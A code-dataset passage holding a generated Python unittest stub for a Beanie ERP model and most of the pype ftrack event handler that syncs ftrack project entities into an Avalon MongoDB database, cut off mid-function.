|
[
"Apache-2.0"
] | null | null | null |
test/test_fixed_asset_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.2
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import beanie
from beanie.models.fixed_asset_input import FixedAssetInput # noqa: E501
from beanie.rest import ApiException
class TestFixedAssetInput(unittest.TestCase):
"""FixedAssetInput unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testFixedAssetInput(self):
"""Test FixedAssetInput"""
# FIXME: construct object with mandatory attributes with example values
# model = beanie.models.fixed_asset_input.FixedAssetInput() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 21.804878
| 81
| 0.700224
|
251d87331e8040de8b5fd2f18b72cb0129f34d0c
| 94,153
|
py
|
Python
|
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
pype/modules/ftrack/events/event_sync_to_avalon.py
|
Yowza-Animation/pype
|
0212fa8357e6ffd490230193e69e101aaf262587
|
[
"MIT"
] | null | null | null |
import os
import collections
import copy
import queue
import time
import datetime
import atexit
import traceback
from bson.objectid import ObjectId
from pymongo import UpdateOne
from avalon import schema
from pype.modules.ftrack.lib import avalon_sync
from pype.modules.ftrack.lib.avalon_sync import (
CUST_ATTR_ID_KEY, CUST_ATTR_AUTO_SYNC, EntitySchemas
)
import ftrack_api
from pype.modules.ftrack import BaseEvent
from avalon.api import AvalonMongoDB
class SyncToAvalonEvent(BaseEvent):
dbcon = AvalonMongoDB()
interest_entTypes = ["show", "task"]
ignore_ent_types = ["Milestone"]
ignore_keys = ["statusid", "thumbid"]
project_query = (
"select full_name, name, custom_attributes"
", project_schema._task_type_schema.types.name"
" from Project where id is \"{}\""
)
entities_query_by_id = (
"select id, name, parent_id, link, custom_attributes from TypedContext"
" where project_id is \"{}\" and id in ({})"
)
# useful for getting all tasks for asset
task_entities_query_by_parent_id = (
"select id, name, parent_id, type_id from Task"
" where project_id is \"{}\" and parent_id in ({})"
)
task_types_query = (
"select id, name from Type"
)
entities_name_query_by_name = (
"select id, name from TypedContext"
" where project_id is \"{}\" and name in ({})"
)
created_entities = []
report_splitter = {"type": "label", "value": "---"}
def __init__(self, session, plugins_presets={}):
'''Expects a ftrack_api.Session instance'''
# Debug settings
# - time expiration in seconds
self.debug_print_time_expiration = 5 * 60
# - store current time
self.debug_print_time = datetime.datetime.now()
# - store synchronize entity types to be able to use
# only entityTypes in interest instead of filtering by ignored
self.debug_sync_types = collections.defaultdict(list)
# Set processing session to not use global
self.set_process_session(session)
super().__init__(session, plugins_presets)
def debug_logs(self):
"""This is debug method for printing small debugs messages. """
now_datetime = datetime.datetime.now()
delta = now_datetime - self.debug_print_time
if delta.total_seconds() < self.debug_print_time_expiration:
return
self.debug_print_time = now_datetime
known_types_items = []
for entityType, entity_type in self.debug_sync_types.items():
ent_types_msg = ", ".join(entity_type)
known_types_items.append(
"<{}> ({})".format(entityType, ent_types_msg)
)
known_entityTypes = ", ".join(known_types_items)
self.log.debug(
"DEBUG MESSAGE: Known types {}".format(known_entityTypes)
)
@property
def cur_project(self):
if self._cur_project is None:
found_id = None
for ent_info in self._cur_event["data"]["entities"]:
if found_id is not None:
break
parents = ent_info.get("parents") or []
for parent in parents:
if parent.get("entityType") == "show":
found_id = parent.get("entityId")
break
if found_id:
self._cur_project = self.process_session.query(
self.project_query.format(found_id)
).one()
return self._cur_project
@property
def avalon_cust_attrs(self):
if self._avalon_cust_attrs is None:
self._avalon_cust_attrs = avalon_sync.get_pype_attr(
self.process_session
)
return self._avalon_cust_attrs
@property
def avalon_entities(self):
if self._avalon_ents is None:
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
avalon_project = self.dbcon.find_one({"type": "project"})
avalon_entities = list(self.dbcon.find({"type": "asset"}))
self._avalon_ents = (avalon_project, avalon_entities)
return self._avalon_ents
@property
def avalon_ents_by_name(self):
if self._avalon_ents_by_name is None:
self._avalon_ents_by_name = {}
proj, ents = self.avalon_entities
for ent in ents:
self._avalon_ents_by_name[ent["name"]] = ent
return self._avalon_ents_by_name
@property
def avalon_ents_by_id(self):
if self._avalon_ents_by_id is None:
self._avalon_ents_by_id = {}
proj, ents = self.avalon_entities
if proj:
self._avalon_ents_by_id[proj["_id"]] = proj
for ent in ents:
self._avalon_ents_by_id[ent["_id"]] = ent
return self._avalon_ents_by_id
@property
def avalon_ents_by_parent_id(self):
if self._avalon_ents_by_parent_id is None:
self._avalon_ents_by_parent_id = collections.defaultdict(list)
proj, ents = self.avalon_entities
for ent in ents:
vis_par = ent["data"]["visualParent"]
if vis_par is None:
vis_par = proj["_id"]
self._avalon_ents_by_parent_id[vis_par].append(ent)
return self._avalon_ents_by_parent_id
@property
def avalon_ents_by_ftrack_id(self):
if self._avalon_ents_by_ftrack_id is None:
self._avalon_ents_by_ftrack_id = {}
proj, ents = self.avalon_entities
if proj:
ftrack_id = proj["data"]["ftrackId"]
self._avalon_ents_by_ftrack_id[ftrack_id] = proj
for ent in ents:
ftrack_id = ent["data"].get("ftrackId")
if ftrack_id is None:
continue
self._avalon_ents_by_ftrack_id[ftrack_id] = ent
return self._avalon_ents_by_ftrack_id
@property
def avalon_subsets_by_parents(self):
if self._avalon_subsets_by_parents is None:
self._avalon_subsets_by_parents = collections.defaultdict(list)
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
for subset in self.dbcon.find({"type": "subset"}):
self._avalon_subsets_by_parents[subset["parent"]].append(
subset
)
return self._avalon_subsets_by_parents
@property
def avalon_archived_by_id(self):
if self._avalon_archived_by_id is None:
self._avalon_archived_by_id = {}
self.dbcon.install()
self.dbcon.Session["AVALON_PROJECT"] = (
self.cur_project["full_name"]
)
for asset in self.dbcon.find({"type": "archived_asset"}):
self._avalon_archived_by_id[asset["_id"]] = asset
return self._avalon_archived_by_id
@property
def avalon_archived_by_name(self):
if self._avalon_archived_by_name is None:
self._avalon_archived_by_name = {}
for asset in self.avalon_archived_by_id.values():
self._avalon_archived_by_name[asset["name"]] = asset
return self._avalon_archived_by_name
@property
def changeability_by_mongo_id(self):
"""Return info about changeability of entity and it's parents."""
if self._changeability_by_mongo_id is None:
self._changeability_by_mongo_id = collections.defaultdict(
lambda: True
)
avalon_project, avalon_entities = self.avalon_entities
self._changeability_by_mongo_id[avalon_project["_id"]] = False
self._bubble_changeability(
list(self.avalon_subsets_by_parents.keys())
)
return self._changeability_by_mongo_id
@property
def avalon_custom_attributes(self):
"""Return info about changeability of entity and it's parents."""
if self._avalon_custom_attributes is None:
self._avalon_custom_attributes = avalon_sync.get_pype_attr(
self.process_session
)
return self._avalon_custom_attributes
def remove_cached_by_key(self, key, values):
if self._avalon_ents is None:
return
if not isinstance(values, (list, tuple)):
values = [values]
def get_found_data(entity):
if not entity:
return None
return {
"ftrack_id": entity["data"]["ftrackId"],
"parent_id": entity["data"]["visualParent"],
"_id": entity["_id"],
"name": entity["name"],
"entity": entity
}
if key == "id":
key = "_id"
elif key == "ftrack_id":
key = "data.ftrackId"
found_data = {}
project, entities = self._avalon_ents
key_items = key.split(".")
for value in values:
ent = None
if key == "_id":
if self._avalon_ents_by_id is not None:
ent = self._avalon_ents_by_id.get(value)
elif key == "name":
if self._avalon_ents_by_name is not None:
ent = self._avalon_ents_by_name.get(value)
elif key == "data.ftrackId":
if self._avalon_ents_by_ftrack_id is not None:
ent = self._avalon_ents_by_ftrack_id.get(value)
if ent is None:
for _ent in entities:
_temp = _ent
for item in key_items:
_temp = _temp[item]
if _temp == value:
ent = _ent
break
found_data[value] = get_found_data(ent)
for value in values:
data = found_data[value]
if not data:
# TODO logging
self.log.warning(
"Didn't found entity by key/value \"{}\" / \"{}\"".format(
key, value
)
)
continue
ftrack_id = data["ftrack_id"]
parent_id = data["parent_id"]
mongo_id = data["_id"]
name = data["name"]
entity = data["entity"]
project, ents = self._avalon_ents
ents.remove(entity)
self._avalon_ents = project, ents
if self._avalon_ents_by_ftrack_id is not None:
self._avalon_ents_by_ftrack_id.pop(ftrack_id, None)
if self._avalon_ents_by_parent_id is not None:
self._avalon_ents_by_parent_id[parent_id].remove(entity)
if self._avalon_ents_by_id is not None:
self._avalon_ents_by_id.pop(mongo_id, None)
if self._avalon_ents_by_name is not None:
self._avalon_ents_by_name.pop(name, None)
if self._avalon_archived_by_id is not None:
self._avalon_archived_by_id[mongo_id] = entity
def _bubble_changeability(self, unchangeable_ids):
unchangeable_queue = queue.Queue()
for entity_id in unchangeable_ids:
unchangeable_queue.put((entity_id, False))
processed_parents_ids = []
while not unchangeable_queue.empty():
entity_id, child_is_archived = unchangeable_queue.get()
# skip if already processed
if entity_id in processed_parents_ids:
continue
entity = self.avalon_ents_by_id.get(entity_id)
# if entity is not archived but unchageable child was then skip
# - archived entities should not affect not archived?
if entity and child_is_archived:
continue
# set changeability of current entity to False
self._changeability_by_mongo_id[entity_id] = False
processed_parents_ids.append(entity_id)
# if not entity then is probably archived
if not entity:
entity = self.avalon_archived_by_id.get(entity_id)
child_is_archived = True
if not entity:
# if entity is not found then it is subset without parent
if entity_id in unchangeable_ids:
_subset_ids = [
str(sub["_id"]) for sub in
self.avalon_subsets_by_parents[entity_id]
]
joined_subset_ids = "| ".join(_subset_ids)
self.log.warning((
"Parent <{}> for subsets <{}> does not exist"
).format(str(entity_id), joined_subset_ids))
else:
self.log.warning((
"In avalon are entities without valid parents that"
" lead to Project (should not cause errors)"
" - MongoId <{}>"
).format(str(entity_id)))
continue
# skip if parent is project
parent_id = entity["data"]["visualParent"]
if parent_id is None:
continue
unchangeable_queue.put((parent_id, child_is_archived))
def reset_variables(self):
"""Reset variables so each event callback has clear env."""
self._cur_project = None
self._avalon_cust_attrs = None
self._avalon_ents = None
self._avalon_ents_by_id = None
self._avalon_ents_by_parent_id = None
self._avalon_ents_by_ftrack_id = None
self._avalon_ents_by_name = None
self._avalon_subsets_by_parents = None
self._changeability_by_mongo_id = None
self._avalon_archived_by_id = None
self._avalon_archived_by_name = None
self._avalon_custom_attributes = None
self._ent_types_by_name = None
self.ftrack_ents_by_id = {}
self.obj_id_ent_type_map = {}
self.ftrack_recreated_mapping = {}
self.ftrack_added = {}
self.ftrack_moved = {}
self.ftrack_renamed = {}
self.ftrack_updated = {}
self.ftrack_removed = {}
# set of ftrack ids with modified tasks
# handled separately by full wipeout and replace from FTrack
self.modified_tasks_ftrackids = set()
self.moved_in_avalon = []
self.renamed_in_avalon = []
self.hier_cust_attrs_changes = collections.defaultdict(list)
self.duplicated = []
self.regex_failed = []
self.regex_schemas = {}
self.updates = collections.defaultdict(dict)
self.report_items = {
"info": collections.defaultdict(list),
"warning": collections.defaultdict(list),
"error": collections.defaultdict(list)
}
def set_process_session(self, session):
try:
self.process_session.close()
except Exception:
pass
self.process_session = ftrack_api.Session(
server_url=session.server_url,
api_key=session.api_key,
api_user=session.api_user,
auto_connect_event_hub=True
)
atexit.register(lambda: self.process_session.close())
def filter_updated(self, updates):
filtered_updates = {}
for ftrack_id, ent_info in updates.items():
changed_keys = [k for k in (ent_info.get("keys") or [])]
changes = {
k: v for k, v in (ent_info.get("changes") or {}).items()
}
entity_type = ent_info["entity_type"]
if entity_type == "Task":
if "name" in changed_keys:
ent_info["keys"] = ["name"]
ent_info["changes"] = {"name": changes.pop("name")}
filtered_updates[ftrack_id] = ent_info
continue
for _key in self.ignore_keys:
if _key in changed_keys:
changed_keys.remove(_key)
changes.pop(_key, None)
if not changed_keys:
continue
# Remove custom attributes starting with `avalon_` from changes
# - these custom attributes are not synchronized
avalon_keys = []
for key in changes:
if key.startswith("avalon_"):
avalon_keys.append(key)
for _key in avalon_keys:
changed_keys.remove(_key)
changes.pop(_key, None)
if not changed_keys:
continue
ent_info["keys"] = changed_keys
ent_info["changes"] = changes
filtered_updates[ftrack_id] = ent_info
return filtered_updates
def get_ent_path(self, ftrack_id):
"""
Looks for entity in FTrack with 'ftrack_id'. If found returns
concatenated paths from its 'link' elemenent's names. Describes
location of entity in tree.
Args:
ftrack_id (string): entityId of FTrack entity
Returns:
(string) - example : "/test_project/assets/my_asset"
"""
entity = self.ftrack_ents_by_id.get(ftrack_id)
if not entity:
entity = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], ftrack_id
)
).first()
if entity:
self.ftrack_ents_by_id[ftrack_id] = entity
else:
return "unknown hierarchy"
return "/".join([ent["name"] for ent in entity["link"]])
def launch(self, session, event):
"""
Main entry port for synchronization.
Goes through event (can contain multiple changes) and decides if
the event is interesting for us (interest_entTypes).
It separates changes into add|remove|update.
All task changes are handled together by refresh from Ftrack.
Args:
session (object): session to Ftrack
event (dictionary): event content
Returns:
(boolean or None)
"""
# Try to commit and if any error happen then recreate session
try:
self.process_session.commit()
except Exception:
self.set_process_session(session)
# Reset object values for each launch
self.reset_variables()
self._cur_event = event
entities_by_action = {
"remove": {},
"update": {},
"move": {},
"add": {}
}
entities_info = event["data"]["entities"]
found_actions = set()
for ent_info in entities_info:
entityType = ent_info["entityType"]
if entityType not in self.interest_entTypes:
continue
entity_type = ent_info.get("entity_type")
if not entity_type or entity_type in self.ignore_ent_types:
continue
if entity_type not in self.debug_sync_types[entityType]:
self.debug_sync_types[entityType].append(entity_type)
action = ent_info["action"]
ftrack_id = ent_info["entityId"]
if isinstance(ftrack_id, list):
self.log.warning((
"BUG REPORT: Entity info has `entityId` as `list` \"{}\""
).format(ent_info))
if len(ftrack_id) == 0:
continue
ftrack_id = ftrack_id[0]
# task modified, collect parent id of task, handle separately
if entity_type.lower() == "task":
changes = ent_info.get("changes") or {}
if action == "move":
parent_changes = changes["parent_id"]
self.modified_tasks_ftrackids.add(parent_changes["new"])
self.modified_tasks_ftrackids.add(parent_changes["old"])
elif "typeid" in changes or "name" in changes:
self.modified_tasks_ftrackids.add(ent_info["parentId"])
continue
if action == "move":
ent_keys = ent_info["keys"]
# Separate update info from move action
if len(ent_keys) > 1:
_ent_info = ent_info.copy()
for ent_key in ent_keys:
if ent_key == "parent_id":
_ent_info["changes"].pop(ent_key, None)
_ent_info["keys"].remove(ent_key)
else:
ent_info["changes"].pop(ent_key, None)
ent_info["keys"].remove(ent_key)
entities_by_action["update"][ftrack_id] = _ent_info
# regular change process handles all other than Tasks
found_actions.add(action)
entities_by_action[action][ftrack_id] = ent_info
found_actions = list(found_actions)
if not found_actions and not self.modified_tasks_ftrackids:
return True
# Check if auto sync was turned on/off
updated = entities_by_action["update"]
for ftrack_id, ent_info in updated.items():
# filter project
if ent_info["entityType"] != "show":
continue
changes = ent_info["changes"]
if CUST_ATTR_AUTO_SYNC not in changes:
continue
auto_sync = changes[CUST_ATTR_AUTO_SYNC]["new"]
if auto_sync == "1":
# Trigger sync to avalon action if auto sync was turned on
ft_project = self.cur_project
self.log.debug((
"Auto sync was turned on for project <{}>."
" Triggering syncToAvalon action."
).format(ft_project["full_name"]))
selection = [{
"entityId": ft_project["id"],
"entityType": "show"
}]
self.trigger_action(
action_name="sync.to.avalon.server",
event=event,
selection=selection
)
# Exit for both cases
return True
# Filter updated data by changed keys
updated = self.filter_updated(updated)
# skip most of events where nothing has changed for avalon
if (
len(found_actions) == 1
and found_actions[0] == "update"
and not updated
and not self.modified_tasks_ftrackids
):
return True
ft_project = self.cur_project
# Check if auto-sync custom attribute exists
if CUST_ATTR_AUTO_SYNC not in ft_project["custom_attributes"]:
# TODO should we sent message to someone?
self.log.error((
"Custom attribute \"{}\" is not created or user \"{}\" used"
" for Event server don't have permissions to access it!"
).format(CUST_ATTR_AUTO_SYNC, self.session.api_user))
return True
# Skip if auto-sync is not set
auto_sync = ft_project["custom_attributes"][CUST_ATTR_AUTO_SYNC]
if auto_sync is not True:
return True
debug_msg = "Updated: {}".format(len(updated))
debug_action_map = {
"add": "Created",
"remove": "Removed",
"move": "Moved"
}
for action, infos in entities_by_action.items():
if action == "update":
continue
_action = debug_action_map[action]
debug_msg += "| {}: {}".format(_action, len(infos))
self.log.debug("Project changes <{}>: {}".format(
ft_project["full_name"], debug_msg
))
# Get ftrack entities - find all ftrack ids first
ftrack_ids = set(updated.keys())
for action, _ftrack_ids in entities_by_action.items():
# skip updated (already prepared) and removed (not exist in ftrack)
if action not in ("remove", "update"):
ftrack_ids |= set(_ftrack_ids)
# collect entity records data which might not be in event
if ftrack_ids:
joined_ids = ", ".join(["\"{}\"".format(id) for id in ftrack_ids])
ftrack_entities = self.process_session.query(
self.entities_query_by_id.format(ft_project["id"], joined_ids)
).all()
for entity in ftrack_entities:
self.ftrack_ents_by_id[entity["id"]] = entity
# Filter updates where name is changing
for ftrack_id, ent_info in updated.items():
ent_keys = ent_info["keys"]
# Seprate update info from rename
if "name" not in ent_keys:
continue
_ent_info = copy.deepcopy(ent_info)
for ent_key in ent_keys:
if ent_key == "name":
ent_info["changes"].pop(ent_key, None)
ent_info["keys"].remove(ent_key)
else:
_ent_info["changes"].pop(ent_key, None)
_ent_info["keys"].remove(ent_key)
self.ftrack_renamed[ftrack_id] = _ent_info
self.ftrack_removed = entities_by_action["remove"]
self.ftrack_moved = entities_by_action["move"]
self.ftrack_added = entities_by_action["add"]
self.ftrack_updated = updated
self.debug_logs()
self.log.debug("Synchronization begins")
try:
time_1 = time.time()
# 1.) Process removed - may affect all other actions
self.process_removed()
time_2 = time.time()
# 2.) Process renamed - may affect added
self.process_renamed()
time_3 = time.time()
# 3.) Process added - moved entity may be moved to new entity
self.process_added()
time_4 = time.time()
# 4.) Process moved
self.process_moved()
time_5 = time.time()
# 5.) Process updated
self.process_updated()
time_6 = time.time()
# 6.) Process changes in hierarchy or hier custom attribues
self.process_hier_cleanup()
time_7 = time.time()
self.process_task_updates()
if self.updates:
self.update_entities()
time_8 = time.time()
time_removed = time_2 - time_1
time_renamed = time_3 - time_2
time_added = time_4 - time_3
time_moved = time_5 - time_4
time_updated = time_6 - time_5
time_cleanup = time_7 - time_6
time_task_updates = time_8 - time_7
time_total = time_8 - time_1
self.log.debug((
"Process time: {:.2f} <{:.2f}, {:.2f}, {:.2f}, "
"{:.2f}, {:.2f}, {:.2f}, {:.2f}>"
).format(
time_total, time_removed, time_renamed, time_added,
time_moved, time_updated, time_cleanup, time_task_updates
))
except Exception:
msg = "An error has happened during synchronization"
self.report_items["error"][msg].append((
str(traceback.format_exc()).replace("\n", "<br>")
).replace(" ", " "))
self.report()
return True
def process_removed(self):
"""
Handles removed entities (not removed tasks - handle separately).
"""
if not self.ftrack_removed:
return
ent_infos = self.ftrack_removed
self.log.debug(
"Processing removed entities: {}".format(str(ent_infos))
)
removable_ids = []
recreate_ents = []
removed_names = []
for ftrack_id, removed in ent_infos.items():
entity_type = removed["entity_type"]
if entity_type.lower() == "task":
continue
removed_name = removed["changes"]["name"]["old"]
avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_ent:
continue
mongo_id = avalon_ent["_id"]
if self.changeability_by_mongo_id[mongo_id]:
removable_ids.append(mongo_id)
removed_names.append(removed_name)
else:
recreate_ents.append(avalon_ent)
if removable_ids:
# TODO logging
self.log.debug("Assets marked as archived <{}>".format(
", ".join(removed_names)
))
self.dbcon.update_many(
{"_id": {"$in": removable_ids}, "type": "asset"},
{"$set": {"type": "archived_asset"}}
)
self.remove_cached_by_key("id", removable_ids)
if recreate_ents:
# sort removed entities by parents len
# - length of parents determine hierarchy level
recreate_ents = sorted(
recreate_ents,
key=(lambda item: len(
(item.get("data", {}).get("parents") or [])
))
)
# TODO logging
# TODO report
recreate_msg = (
"Deleted entity was recreated||Entity was recreated because"
" it or its children contain published data"
)
proj, ents = self.avalon_entities
for avalon_entity in recreate_ents:
old_ftrack_id = avalon_entity["data"]["ftrackId"]
vis_par = avalon_entity["data"]["visualParent"]
if vis_par is None:
vis_par = proj["_id"]
parent_ent = self.avalon_ents_by_id[vis_par]
parent_ftrack_id = parent_ent["data"]["ftrackId"]
parent_ftrack_ent = self.ftrack_ents_by_id.get(
parent_ftrack_id
)
if not parent_ftrack_ent:
if parent_ent["type"].lower() == "project":
parent_ftrack_ent = self.cur_project
else:
parent_ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], parent_ftrack_id
)
).one()
entity_type = avalon_entity["data"]["entityType"]
new_entity = self.process_session.create(entity_type, {
"name": avalon_entity["name"],
"parent": parent_ftrack_ent
})
try:
self.process_session.commit()
except Exception:
# TODO logging
# TODO report
self.process_session.rolback()
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend([
par for par in avalon_entity["data"]["parents"]
])
ent_path_items.append(avalon_entity["name"])
ent_path = "/".join(ent_path_items)
error_msg = "Couldn't recreate entity in Ftrack"
report_msg = (
"{}||Trying to recreate because it or its children"
" contain published data"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.warning(
"{}. Process session commit failed! <{}>".format(
error_msg, ent_path
),
exc_info=True
)
continue
new_entity_id = new_entity["id"]
avalon_entity["data"]["ftrackId"] = new_entity_id
for key, val in avalon_entity["data"].items():
if not val:
continue
if key not in new_entity["custom_attributes"]:
continue
new_entity["custom_attributes"][key] = val
new_entity["custom_attributes"][CUST_ATTR_ID_KEY] = (
str(avalon_entity["_id"])
)
ent_path = self.get_ent_path(new_entity_id)
try:
self.process_session.commit()
except Exception:
# TODO logging
# TODO report
self.process_session.rolback()
error_msg = (
"Couldn't update custom attributes after recreation"
" of entity in Ftrack"
)
report_msg = (
"{}||Entity was recreated because it or its children"
" contain published data"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.warning(
"{}. Process session commit failed! <{}>".format(
error_msg, ent_path
),
exc_info=True
)
continue
self.report_items["info"][recreate_msg].append(ent_path)
self.ftrack_recreated_mapping[old_ftrack_id] = new_entity_id
self.process_session.commit()
found_idx = None
proj_doc, asset_docs = self._avalon_ents
for idx, asset_doc in enumerate(asset_docs):
if asset_doc["_id"] == avalon_entity["_id"]:
found_idx = idx
break
if found_idx is None:
continue
# Prepare updates dict for mongo update
if "data" not in self.updates[avalon_entity["_id"]]:
self.updates[avalon_entity["_id"]]["data"] = {}
self.updates[avalon_entity["_id"]]["data"]["ftrackId"] = (
new_entity_id
)
# Update cached entities
asset_docs[found_idx] = avalon_entity
self._avalon_ents = proj_doc, asset_docs
if self._avalon_ents_by_id is not None:
mongo_id = avalon_entity["_id"]
self._avalon_ents_by_id[mongo_id] = avalon_entity
if self._avalon_ents_by_parent_id is not None:
vis_par = avalon_entity["data"]["visualParent"]
children = self._avalon_ents_by_parent_id[vis_par]
found_idx = None
for idx, _entity in enumerate(children):
if _entity["_id"] == avalon_entity["_id"]:
found_idx = idx
break
children[found_idx] = avalon_entity
self._avalon_ents_by_parent_id[vis_par] = children
if self._avalon_ents_by_ftrack_id is not None:
self._avalon_ents_by_ftrack_id.pop(old_ftrack_id)
self._avalon_ents_by_ftrack_id[new_entity_id] = (
avalon_entity
)
if self._avalon_ents_by_name is not None:
name = avalon_entity["name"]
self._avalon_ents_by_name[name] = avalon_entity
# Check if entities with same name can be synchronized
if not removed_names:
return
self.check_names_synchronizable(removed_names)
def check_names_synchronizable(self, names):
"""Check if entities with specific names are importable.
This check should happend after removing entity or renaming entity.
When entity was removed or renamed then it's name is possible to sync.
"""
joined_passed_names = ", ".join(
["\"{}\"".format(name) for name in names]
)
same_name_entities = self.process_session.query(
self.entities_name_query_by_name.format(
self.cur_project["id"], joined_passed_names
)
).all()
if not same_name_entities:
return
entities_by_name = collections.defaultdict(list)
for entity in same_name_entities:
entities_by_name[entity["name"]].append(entity)
synchronizable_ents = []
self.log.debug((
"Deleting of entities should allow to synchronize another entities"
" with same name."
))
for name, ents in entities_by_name.items():
if len(ents) != 1:
self.log.debug((
"Name \"{}\" still have more than one entity <{}>"
).format(
name, "| ".join(
[self.get_ent_path(ent["id"]) for ent in ents]
)
))
continue
entity = ents[0]
ent_path = self.get_ent_path(entity["id"])
# TODO logging
self.log.debug(
"Checking if can synchronize entity <{}>".format(ent_path)
)
# skip if already synchronized
ftrack_id = entity["id"]
if ftrack_id in self.avalon_ents_by_ftrack_id:
# TODO logging
self.log.debug(
"- Entity is already synchronized (skipping) <{}>".format(
ent_path
)
)
continue
parent_id = entity["parent_id"]
if parent_id not in self.avalon_ents_by_ftrack_id:
# TODO logging
self.log.debug((
"- Entity's parent entity doesn't seems to"
" be synchronized (skipping) <{}>"
).format(ent_path))
continue
synchronizable_ents.append(entity)
if not synchronizable_ents:
return
synchronizable_ents = sorted(
synchronizable_ents,
key=(lambda entity: len(entity["link"]))
)
children_queue = queue.Queue()
for entity in synchronizable_ents:
parent_avalon_ent = self.avalon_ents_by_ftrack_id[
entity["parent_id"]
]
self.create_entity_in_avalon(entity, parent_avalon_ent)
for child in entity["children"]:
if child.entity_type.lower() == "task":
continue
children_queue.put(child)
while not children_queue.empty():
entity = children_queue.get()
ftrack_id = entity["id"]
name = entity["name"]
ent_by_ftrack_id = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if ent_by_ftrack_id:
raise Exception((
"This is bug, parent was just synchronized to avalon"
" but entity is already in database {}"
).format(dict(entity)))
# Entity has duplicated name with another entity
# - may be renamed: in that case renaming method will handle that
duplicate_ent = self.avalon_ents_by_name.get(name)
if duplicate_ent:
continue
passed_regex = avalon_sync.check_regex(
name, "asset", schema_patterns=self.regex_schemas
)
if not passed_regex:
continue
parent_id = entity["parent_id"]
parent_avalon_ent = self.avalon_ents_by_ftrack_id[parent_id]
self.create_entity_in_avalon(entity, parent_avalon_ent)
for child in entity["children"]:
if child.entity_type.lower() == "task":
continue
children_queue.put(child)
def create_entity_in_avalon(self, ftrack_ent, parent_avalon):
proj, ents = self.avalon_entities
# Parents, Hierarchy
ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
parents = ent_path_items[1:len(ent_path_items)-1:]
hierarchy = ""
if len(parents) > 0:
hierarchy = os.path.sep.join(parents)
# TODO logging
self.log.debug(
"Trying to synchronize entity <{}>".format(
"/".join(ent_path_items)
)
)
# Add entity to modified so tasks are added at the end
self.modified_tasks_ftrackids.add(ftrack_ent["id"])
# Visual Parent
vis_par = None
if parent_avalon["type"].lower() != "project":
vis_par = parent_avalon["_id"]
mongo_id = ObjectId()
name = ftrack_ent["name"]
final_entity = {
"_id": mongo_id,
"name": name,
"type": "asset",
"schema": EntitySchemas["asset"],
"parent": proj["_id"],
"data": {
"ftrackId": ftrack_ent["id"],
"entityType": ftrack_ent.entity_type,
"parents": parents,
"hierarchy": hierarchy,
"tasks": {},
"visualParent": vis_par
}
}
cust_attrs = self.get_cust_attr_values(ftrack_ent)
for key, val in cust_attrs.items():
if key.startswith("avalon_"):
continue
final_entity["data"][key] = val
_mongo_id_str = cust_attrs.get(CUST_ATTR_ID_KEY)
if _mongo_id_str:
try:
_mongo_id = ObjectId(_mongo_id_str)
if _mongo_id not in self.avalon_ents_by_id:
mongo_id = _mongo_id
final_entity["_id"] = mongo_id
except Exception:
pass
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend([par for par in parents])
ent_path_items.append(name)
ent_path = "/".join(ent_path_items)
try:
schema.validate(final_entity)
except Exception:
# TODO logging
# TODO report
error_msg = (
"Schema validation failed for new entity (This is a bug)"
)
error_traceback = (
str(traceback.format_exc()).replace("\n", "<br>")
).replace(" ", " ")
item_msg = ent_path + "<br>" + error_traceback
self.report_items["error"][error_msg].append(item_msg)
self.log.error(
"{}: \"{}\"".format(error_msg, str(final_entity)),
exc_info=True
)
return None
replaced = False
archived = self.avalon_archived_by_name.get(name)
if archived:
archived_id = archived["_id"]
if (
archived["data"]["parents"] == parents or
self.changeability_by_mongo_id[archived_id]
):
# TODO logging
self.log.debug(
"Entity was unarchived instead of creation <{}>".format(
ent_path
)
)
mongo_id = archived_id
final_entity["_id"] = mongo_id
self.dbcon.replace_one({"_id": mongo_id}, final_entity)
replaced = True
if not replaced:
self.dbcon.insert_one(final_entity)
# TODO logging
self.log.debug("Entity was synchronized <{}>".format(ent_path))
mongo_id_str = str(mongo_id)
if mongo_id_str != ftrack_ent["custom_attributes"][CUST_ATTR_ID_KEY]:
ftrack_ent["custom_attributes"][CUST_ATTR_ID_KEY] = mongo_id_str
try:
self.process_session.commit()
except Exception:
self.process_session.rolback()
# TODO logging
# TODO report
error_msg = (
"Failed to store MongoID to entity's custom attribute"
)
report_msg = (
"{}||SyncToAvalon action may solve this issue"
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.error(
"{}: \"{}\"".format(error_msg, ent_path),
exc_info=True
)
# modify cached data
# Skip if self._avalon_ents is not set(maybe never happen)
if self._avalon_ents is None:
return final_entity
if self._avalon_ents is not None:
proj, ents = self._avalon_ents
ents.append(final_entity)
self._avalon_ents = (proj, ents)
if self._avalon_ents_by_id is not None:
self._avalon_ents_by_id[mongo_id] = final_entity
if self._avalon_ents_by_parent_id is not None:
self._avalon_ents_by_parent_id[vis_par].append(final_entity)
if self._avalon_ents_by_ftrack_id is not None:
self._avalon_ents_by_ftrack_id[ftrack_ent["id"]] = final_entity
if self._avalon_ents_by_name is not None:
self._avalon_ents_by_name[ftrack_ent["name"]] = final_entity
return final_entity
def get_cust_attr_values(self, entity, keys=None):
output = {}
